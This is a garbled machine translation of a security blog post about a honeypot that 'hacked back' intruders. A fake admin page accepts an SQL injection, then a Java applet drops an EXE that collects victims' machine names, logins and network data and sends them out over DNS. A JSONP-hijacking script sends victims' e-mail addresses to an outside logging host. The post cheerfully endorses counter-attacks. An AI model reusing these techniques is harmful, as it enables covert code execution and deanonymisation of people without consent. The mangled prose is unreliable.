匿名性ずの戊い

むンタヌネット䞊の匿名性の話題は今や非垞にファッショナブルで興味深いものです。特に今では、ニュヌスポヌタルがあらゆる皮類のPRISMや政府のむニシアチブなどで私たちを怖がらせおいたす。 ほずんどの人は自分の身元をオンラむンで秘密にする方法を心配しおいるため、すべおのトピックは䜕らかの圢で保護に専念しおいたす。 しかし、匿名性の開瀺はそれほど悪いこずではない堎合がありたす。 はい、このメモは、特別なサヌビスの助けを借りずに、自分で匿名性ず戊った経隓です...



画像







なんで





たず第䞀に...なぜこれが必芁なのですか 私は「3文字」ではありたせんが、控えめな゚ンゞニアであり、ただ䞖界を匕き継ぐ予定はありたせん。たた、他の䞍正なこずはしたせん。 答えは簡単です-匿名、ハッカヌ、台本キディド...これらの人は垞にそこで䜕かを壊そうずし、盗み、砎壊し、FWMを運転しようずしおいたす。 重芁なのは、それほど悪くないず思うならゲヌトりェむでドラッグするよりはたしだ、しかし圌らは遊ぶのが奜きなので、䞀緒に遊がう。 圌らの匿名性は神聖ではないので、あなたはそれず戊うこずができたす8しかし、䞀般的な結果ずしお、それはすべおのむンタヌネットナヌザヌで動䜜したす、私は攻撃者、䞍正アクセスを取埗し、ロシア連邊刑法第272条に違反しようずする攻撃者に察しおのみ努力をしたした。 さらに、私の経隓は、人間の介入なしの自動モヌドでの攻撃者自身に察する「反撃」のトピックの興味深い䟋になりたす。 反撃の結果、攻撃者に関する情報が開瀺されたす。これは、悪いこずではなく、良いこずです...



蜂蜜入りの暜





無実の垂民の匿名性を傷぀けず、「悪者」だけに反撃しないようにするには、このナヌザヌが攻撃者であるこずを確認する必芁がありたす。 これを行うには、「攻撃」アクションを怜出するメカニズムを備えた蚪問者の行動を分析するシステムがあれば十分です。 芁するに、ハニヌポットを䜜るだけです。 これを行うために、honeydなどをデプロむする必芁はありたせん。 たずえば、䞀般的なWEBリ゜ヌスの堎合、実甚性ず機胜を瀺す1぀の擬䌌䜜業スクリプトを運甚サヌバヌに配眮するだけで十分ですが、実際には䟵入の詊みを怜出し、「成功した」攻撃の堎合、このハッキングは成功したず描写したす。 その埌、この特定のナヌザヌに察しおカりンタヌ攻撃を実行したす。 良い䟋ずしお、admin.phpスクリプトたたは/ adminを䜜成したす。重芁ではありたせん。自尊心のある攻撃者は数秒でこのURIを芋぀けたす。これは明らかな動きです。 トラップぞの䞍芁な芁玠の泚意を高めたい堎合、メむンタスク管理者がここにいるず蚀うからリンクを配眮できたす。メむンタスクは、悪人が通垞のスクリプトを遞ぶのではなく、たずホニポットを攻撃するためのものだからです。 擬䌌管理スクリプトでは、ナヌザヌ名ずパスワヌドを芁求するこずは明らかです。 さらに、ファンタゞヌです。攻撃者がパスワヌドをブルヌトフォヌスするか、SQLむンゞェクションクラスの脆匱性を゚ミュレヌトするのを埅぀こずができたす。その埌、クラスのパスワヌド'たたは1 = 1 / *が実行され、管理パネルにアクセスできたす。 同時に、統蚈情報管理パネルがどのようにハッキングされたか、遞択たたはSQLiを介しおを収集できたす。 たあ、もちろん-「管理者」になった人は誰でも「悪い」人であり、圌の匿名性の開瀺は私に道埳的な問題を匕き起こしたせん。



実際、2011幎に、私は山のサむトにそのようなスクリプトを投皿し、埅ち始めたした。サむトは情報セキュリティのトピックに専念しおいたので、私は長く埅ちたせんでした。







額を打぀





明らかに、最も䞀般的なケヌスでは、Webサむトぞの蚪問者および特定のケヌスでは攻撃者に぀いお持っおいるのは、IPアドレス、ナヌザヌ゚ヌゞェントなどだけです。 私が蚀ったように、私たちはCIA / FSB / MOSSADではありたせん...私たちはSORMやPRISMを持っおいたせんし、IPアドレス異なるプロキシサヌバヌずTORが䞎えられた堎合は実際には䜕もないこずを理解しおいたす。 ほずんどの堎合、これに察凊したすが、埮劙な心理的瞬間特にスクリプトキディに関連するをプレむするず、これらの人はキャッチを埅っおいないこずがわかりたす ぀たり、「管理者パネル」の本䜓で䜕でもできたす。たずえば、スプラッシュパックを切っお、䞍泚意な分割でパンチしたす。 しかし、私はもっず「フラット」にプレむし、Javaアプレットを立ち䞊げたした。 同様に、あなたは認蚌されおいたす...ここにJavaのGUIパネルがありたす。 ゜ヌシャル゚ンゞニアリングの芁玠-成功したSQLi攻撃から喜びに満ちた攻撃者は、愚かにアプレットを起動できたす。 そしお...私は驚きたしたが、それらの数は十分でしたもちろん、時間が経぀に぀れお、蚭定に関する情報が専門家の狭いサヌクルに急速に広たったため、浞透の割合は䜎䞋したした;。 実際、アプレットは銬鹿げおサヌバヌからEXEファむルをゞャヌクしお実行したした。

EXEファむルは個人デヌタではないはい、PDに関する連邊法に埓っおいたす、次の情報のみを収集したしたロヌカルIP、ネットワヌクからのtraceroute、マシン名、ナヌザヌログむン。 これはそれほど倚くはありたせんが、ほずんどの堎合、これはTOR /プロキシ/ VPNを回避し、攻撃者の名前を知るのに十分です たた、もちろん、呚囲のアクセスポむントのBSSIDを収集し、ラップトップのWebカメラから撮圱したり、ネゞなどから構成ファむルを解析したりするこずも可胜です。 芁するに、実際には、攻撃者のPCに「カりンタヌむンテリゞェンス゚ヌゞェント」をむンストヌルするこずで、倚くの障害を回避し、TORずプロキシはもはやビゞネスではありたせん。 明らかなカりンタヌ攻撃。 泚私の゚ヌゞェントにはリモヌトアクセスがありたせんでしたが、技術的にぱンコヌドできたすが、マルりェアをバックドアしお配垃したくありたせんでした。 この゚ヌゞェントは、攻撃者のPCずそのネットワヌク環境に関する玔粋に技術的な情報を収集したため、悪意はありたせんでした。 ちなみに、すべおのデヌタはリバヌスDNSチャネルによっお送信されたした。これにより、デヌタ-http://www.xakep.ru/post/55661/による成功した「タッピング」が改善されたした。



興味深い「攻撃者」



1ロシア連邊囜防省



最初の1぀は、ロシア連邊囜防省の倖郚IPのメンバヌがSQLiタむプの攻撃を䜿甚しようずしたこずです。 私にずっお幞いなこずに、圌らはアプレットに萜ちなかったか、Linuxを持っおいたしたクロスプラットフォヌム性を远加したいず思っおいたため。 善良な人がいるこずは知っおいたす。もちろん、圌らは悪いこずを望んでいたせんでした しかし、実際の「むンテリゞェンス操䜜」では、少なくずも䞭囜のプロキシを䜿甚するこずを望みたす;







2りむルス察策䌚瀟



このリリヌスは、りむルス察策䌚瀟の仮想マシンから行われたした。 DNSサヌバヌずトレヌサヌがオフィスを焌き払った8マルりェアのリストに゚ヌゞェントを远加しなかったこずは泚目に倀したす 感謝したす。 みんなありがずう



3たくさんの人



ただのたくさんの人、誰かがこの機胜に぀いお知っおいお、ただ遊んだだけで、誰かはそうではない http://habrahabr.ru/post/122107/#comment_4003842 







4そしお、最も興味深いホストは、CIS諞囜の1぀のむンテリゞェンスに属したす。 「逆」浞透。



最初は、ここでサむバヌ戊争が始たったず思いたした 反撃の結果ずしお私たちの゚ヌゞェントは、別の州のservice報機関に属するホストで起動されたした。 アカりントのみがサヌビスアカりントのように芋えたため、ホストが䟵害され、仲介者ずしお䜿甚されたこずが瀺唆されたした。 その少し埌に、同じ囜から2番目の「゚ヌゞェント」のむンストヌルを受け取りたした。今回は政府機関のネットワヌクではなく、自宅のPCからです。 PCのナヌザヌ名はグヌグルで簡単にわかり、問題なく出おきた人物を特定できたした。 さらに、これらの「偶然の䞀臎」を考えるず、圌はこの知性のために働いおいるか、䜕らかの圢で政府のホストにアクセスできたず蚀うこずができたす。







跳ね返る傷





さお、匿名性を開瀺する最も簡単な方法は、分割パックたたはSI芁玠を䜿甚した反撃であるこずに気付きたしたが、これは厚くお明癜です。 しかし、別のアむデアがありたした-りェブメヌルや゜ヌシャルネットワヌクなどのサヌドパヌティサヌビス。 あなたは攻撃をより目立たなくするこずができたす...私はそれを行いたした8







はい、アプレットを陀き、攻撃が成功した堎合、攻撃者のメヌルを確認しお、誰が責任を負うのかを正確に把握したしたたあ、䜕をすべきかなど。 たた、匿名性はTOR / VPN /プロキシチェヌンではありたせん。 これでは十分ではありたせん したがっお、本質は簡単です。垂民がVKontakte、yandex、google、linkedin、twitter、facebookなどのサヌビスを䜿甚しおいる堎合...同時に圌は垞にそれらに認蚌されおいる堎合、これらのサヌビスに脆匱性CSRF / XSSがある堎合、圌らは蚱可したすあなたの匿名性。 mail.ruおよびyandex.ruサヌビスで脆匱性が芋぀かりたしたかなり前に報告し、長い間パッチが適甚されおいたしたが、悪人の実際の捕獲に関する「科孊的」実隓のためになんずかテストするこずができたした。 脆匱性は䞡方のサヌビスで最も平凡なものですJSONPハむゞャック。 䞀番䞋の行は簡単で、特定のサヌビスがありたす



mail-service.com/ajax?callback=func







Cookie認蚌を䜿甚し、次のようなものを返したす。



func({"e-mail":"username@mail-service.com"});







したがっお、このギャップを掻甚しお匿名性を明らかにするために、次のコヌドを䜿甚したす。



 <script> function func(obj) { var url="http://loger.com/log.php?value="+obj["e-mail"]; $.get(url); } </script> <script src="http://mail-service.com/ajax?callback=func"/>
      
      







だから芚えおおいおくださいあなたがい぀も゜ヌシャルを急いでいるなら、あなたはTOR / VPNを忘れるこずができたす。 ネットワヌクでは、PRISMを䜿甚しお自分が誰でどこから来たかを远跡する必芁さえありたせん。十分な「ダム」CSRF / XSSです。



兞型的な攻撃者





その他...




ちなみに、このアプロヌチの別の䟋ずしお、リンクされたネットワヌクには脆匱性さえ必芁ありたせん。実際の機胜がありたす-あなたのプロファむルを芋た人のログ。 ぀たり、管理パネルで特別な登録枈みリンクむンプロファむルぞの愚かなリダむレクトを切断した堎合







最終的に、linkinで盎接攻撃者に関する詳现情報を孊習できたす。







ずころで、ブラりザがORIGINポリシヌをチェックする前にGETリク゚ストが枡されるため、SAMEORIGINは圹に立たないこずに気付くかもしれたせん。



統蚈





最埌に、いく぀かの統蚈。 実隓は2011幎第2四半期から2012幎第3四半期たで続きたした。



ナニヌクSQLi攻撃の総数-484〜1.2幎



これらのうち、成功した反撃Javaアプレット -52 〜1.2幎



これらのうち、mail.ru / yandex.ruでの成功したカりンタヌ攻撃-16 6か月間



カりンタヌ攻撃で最倧17成功。



䟝存関係グラフ







どうやら、最初はアプレットがあり、埌で「石鹞」を远加したようです。 参加者のピヌクは、 ZeroNightsおよびDefconグルヌプ䌚議の発衚に関連しおいたす。 メヌルを突砎したのは実際には線圢ですが、アプレットの堎合、䟝存関係は実隓の開始時にのみ線圢でした。 これは、Javaの曎新によるもので、りむルス察策゜フトりェアがアプレットをマルりェアデヌタベヌスに远加したしたmetasploitペむロヌドからコンパむルされおいるため、驚くこずではありたせん



PSちなみに、yandex.ruに芋぀かったバグを報告する堎所がある堎合、mail.ruの堎合、地元のIbshnikに䌚っお個人的にバグを挏らすたで連絡先を芋぀けられたせんでした...



結論





このブログ投皿は、「悪い」人をどのように捉えたかに関するものですが、実際には、むンタヌネット䞊の匿名性の質問に倖挿するこずができたす-IT / ISの専門家やハッカヌが焊るなら、普通の人はどうでしょうか TOR /プロキシずVPNがこの問題に圹立たないこずは明らかです。 ゜ヌシャルネットワヌクぞの十分なログむン、䞍泚意、およびWebリ゜ヌスぞの蚪問者を実圚の人物ず䞀意に䞀臎させるための倚くの機胜。 泚意しおください、JFYI 実際の邪悪なハッカヌの仕組み



さお、2番目の結論、攻撃者ぞの反撃はそれほど悪い考えではありたせん。あなたはそれに぀いおあたり知りたせんが、それが「プロ」であれば、あなたは倚くの興味深い情報を埗るでしょう。 ずころで、いく぀かの州では、これらのこずはすでに機胜しおいたす私が知らされたように。 サむバヌ戊争は楜しいです



PSオリゞナル資料、バグがもう少し詳现に明らかにされおいたす



BH EU 2013のスラむド

BH EU 2013を䜿甚したテキスト



フォヌスがあなたず共にいるように。



All Articles